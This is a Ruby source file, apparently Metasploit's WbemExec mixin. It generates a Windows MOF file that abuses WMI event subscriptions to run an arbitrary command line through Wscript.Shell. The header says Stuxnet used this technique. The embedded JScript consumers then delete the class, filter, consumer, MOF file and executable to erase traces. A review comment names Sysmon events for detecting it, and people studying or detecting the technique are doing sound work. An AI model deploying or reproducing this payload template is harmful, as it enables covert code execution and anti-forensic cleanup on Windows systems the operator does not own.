

  1. # -*- coding: binary -*-
  2. #
  3. # This mixin enables executing arbitrary commands via the
  4. # Windows Management Instrumentation service.
  5. #
  6. # By writing the output of these methods to %SystemRoot%\system32\WBEM\mof,
  7. # your command line will be executed.
  8. #
  9. # This technique was used as part of Stuxnet and further reverse engineered
  10. # to this form by Ivanlef0u and jduck.
  11. #
module Msf
module Exploit::WbemExec

  # Build the MOF document that, once compiled by the WMI service, registers
  # the event filter / consumer / binding triples defined in the heredoc below.
  #
  # What the document declares (see the heredoc):
  #   * a throwaway class MyClass<classname> plus one instance of it;
  #   * $Filt / $cons / $bind: an __InstanceCreationEvent filter on that class,
  #     bound to a JScript ActiveScriptEventConsumer ("ASEC") whose ScriptText
  #     runs `exe` through Wscript.Shell and then deletes the class, the
  #     filter 'instfilt' and the consumer 'ASEC';
  #   * $Filt2 / $cons2 / $bind2: an __InstanceDeletionEvent filter on a
  #     Win32_Process named `exe`, bound to a second consumer ("qndASEC") that
  #     deletes wbem\mof\good\<mofname>, the `exe` file, and its own filter
  #     'qndfilt' and consumer.
  #
  # @param mofname [String] file name the compiled MOF is expected to end up
  #   under in wbem\mof\good; it is only referenced by the $cons2 cleanup
  #   script.
  # @param exe [String] command line substituted for every @EXE@ marker. It is
  #   inserted verbatim into a JScript string literal and a WQL query, so the
  #   caller must escape backslashes and double quotes beforehand.
  # @return [String] the MOF text with @CLASS@ and @EXE@ already substituted.
  #
  # NOTE(review): all of these instances are created in the namespace named by
  # the #pragma line (root\cimv2). Enumerating __EventFilter,
  # __FilterToConsumerBinding and ActiveScriptEventConsumer instances there, or
  # alerting on their creation (e.g. Sysmon event IDs 19-21), is the defensive
  # counterpart of this technique.
  def generate_mof(mofname, exe)
    # Random suffix so the throwaway class name differs on every invocation.
    classname = rand(0xffff).to_s
    # From Ivan's decompressed version. This is an interpolating heredoc:
    # Ruby resolves #{mofname} and the backslash escapes before the text is
    # returned, which is why the MOF-level escapes appear doubled here.
    mof = <<-EOT
#pragma namespace("\\\\\\\\.\\\\root\\\\cimv2")
class MyClass@CLASS@
{
[key] string Name;
};
class ActiveScriptEventConsumer : __EventConsumer
{
[key] string Name;
[not_null] string ScriptingEngine;
string ScriptFileName;
[template] string ScriptText;
uint32 KillTimeout;
};
instance of __Win32Provider as $P
{
Name = "ActiveScriptEventConsumer";
CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
PerUserInitialization = TRUE;
};
instance of __EventConsumerProviderRegistration
{
Provider = $P;
ConsumerClassNames = {"ActiveScriptEventConsumer"};
};
Instance of ActiveScriptEventConsumer as $cons
{
Name = "ASEC";
ScriptingEngine = "JScript";
ScriptText = "\\ntry {var s = new ActiveXObject(\\"Wscript.Shell\\");\\ns.Run(\\"@EXE@\\");} catch (err) {};\\nsv = GetObject(\\"winmgmts:root\\\\\\\\cimv2\\");try {sv.Delete(\\"MyClass@CLASS@\\");} catch (err) {};try {sv.Delete(\\"__EventFilter.Name='instfilt'\\");} catch (err) {};try {sv.Delete(\\"ActiveScriptEventConsumer.Name='ASEC'\\");} catch(err) {};";
};
Instance of ActiveScriptEventConsumer as $cons2
{
Name = "qndASEC";
ScriptingEngine = "JScript";
ScriptText = "\\nvar objfs = new ActiveXObject(\\"Scripting.FileSystemObject\\");\\ntry {var f1 = objfs.GetFile(\\"wbem\\\\\\\\mof\\\\\\\\good\\\\\\\\#{mofname}\\");\\nf1.Delete(true);} catch(err) {};\\ntry {\\nvar f2 = objfs.GetFile(\\"@EXE@\\");\\nf2.Delete(true);\\nvar s = GetObject(\\"winmgmts:root\\\\\\\\cimv2\\");s.Delete(\\"__EventFilter.Name='qndfilt'\\");s.Delete(\\"ActiveScriptEventConsumer.Name='qndASEC'\\");\\n} catch(err) {};";
};
instance of __EventFilter as $Filt
{
Name = "instfilt";
Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \\"MyClass@CLASS@\\"";
QueryLanguage = "WQL";
};
instance of __EventFilter as $Filt2
{
Name = "qndfilt";
Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \\"Win32_Process\\" AND TargetInstance.Name = \\"@EXE@\\"";
QueryLanguage = "WQL";
};
instance of __FilterToConsumerBinding as $bind
{
Consumer = $cons;
Filter = $Filt;
};
instance of __FilterToConsumerBinding as $bind2
{
Consumer = $cons2;
Filter = $Filt2;
};
instance of MyClass@CLASS@ as $MyClass
{
Name = "ClassConsumer";
};
EOT
    # Replace the input vars
    mof.gsub!(/@CLASS@/, classname)
    # NOTE: \ and " should be escaped by the caller. A String replacement in
    # gsub also interprets backslash sequences (\\0, \\\\), so a backslash in
    # `exe` does not pass through literally.
    mof.gsub!(/@EXE@/, exe)
    mof
  end
end
end